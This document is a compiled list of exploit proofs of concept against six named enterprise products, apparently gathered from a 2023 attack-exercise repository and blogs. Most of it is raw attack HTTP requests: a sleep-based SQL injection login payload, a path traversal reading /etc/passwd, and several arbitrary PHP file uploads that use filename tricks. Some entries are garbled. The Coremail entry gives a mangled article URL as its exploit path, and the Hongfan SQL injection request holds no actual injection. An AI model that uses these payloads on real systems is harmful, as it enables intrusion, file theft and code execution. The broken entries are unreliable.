0x01 Hongfan OA (红帆 OA)
zyy_AttFile.asmx SQL injection vulnerability

    POST /ioffice/prg/interface/zyy_AttFile.asmx HTTP/1.1
    Host: 10.250.250.5
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
    Content-Length: 383
    Content-Type: text/xml; charset=utf-8
    Soapaction: "http://tempuri.org/GetFileAtt"
    Accept-Encoding: gzip, deflate
    Connection: close

    <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <GetFileAtt xmlns="http://tempuri.org/"><fileName>123</fileName></GetFileAtt> </soap:Body></soap:Envelope>

Source: https://bbs.decoyit.com/thread-597-1-1.html
0x02 Coremail
Mail system unauthorized access exposing administrator account credentials

    /coremail/common/assets/:/:/:/:/:/:/s? biz=Mzl3MTk4NTcyNw==&mid=2247485877&idx=1&sn=7e5f77db320ccf9013c0b7aa7262 6688chksm=eb3834e5dc4fbdf3a9529734de7e6958e1b7efabecd1c1b340c53c80299ff5c688b f6adaed61&scene=2

Source: https://github.com/ibaiw/2023Hvv/blob/main/Coremail%20%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E8%8E%B7%E5%8F%96%E7%AE%A1%E7%90%86%E5%91%98%E8%B4%A6%E5%AF%86.md
0x03 Milesight VPN
server.js arbitrary file read vulnerability

    GET /../etc/passwd HTTP/1.1
    Host:
    Accept: /
    Content-Type: application/x-www-form-urlencoded

Source: https://github.com/ibaiw/2023Hvv/blob/main/Milesight%20VPN%20server.js%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
0x04 PigCMS
action_flashUpload arbitrary file upload vulnerability

    POC:
    POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload HTTP/1.1
    Host:
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=----aaa

    ------aaa
    Content-Disposition: form-data; name="filePath"; filename="test.php"
    Content-Type: video/x-flv

    <?php phpinfo();?>
    ------aaa

    /cms/upload/images/2023/08/11/1691722887xXbx.php

Source: https://github.com/ibaiw/2023Hvv/blob/main/PigCMS%20action_flashUpload%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
0x05
Weaver (泛微) E-Office CVE-2023-2523/CVE-2023-2648 arbitrary file upload

    POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1
    Host: 127.0.0.1
    Content-Length: 352
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: null
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Connection: close

    ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
    Content-Disposition: form-data; name="upload_quwan"; filename="1.php."
    Content-Type: image/jpeg

    <?php phpinfo();?>
    ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
    Content-Disposition: form-data; name="file"; filename=""
    Content-Type: application/octet-stream


    ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--

    POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
    Host: 127.0.0.1
    Content-Length: 204
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: null
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Connection: close

    ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
    Content-Disposition: form-data; name="Fdiledata"; filename="uploadify.php."
    Content-Type: image/jpeg

    <?php phpinfo();?>
    ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt

Source: https://blog.csdn.net/qq_41904294/article/details/130832416
0x06
Chenxin Jingyun (辰信景云) Terminal Security Management System login SQL injection vulnerability

    POST /api/user/login

    captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(3))a)='

Source: https://github.com/ibaiw/2023Hvv/blob/main/%E8%BE%B0%E4%BF%A1%E6%99%AF%E4%BA%91%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20login%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md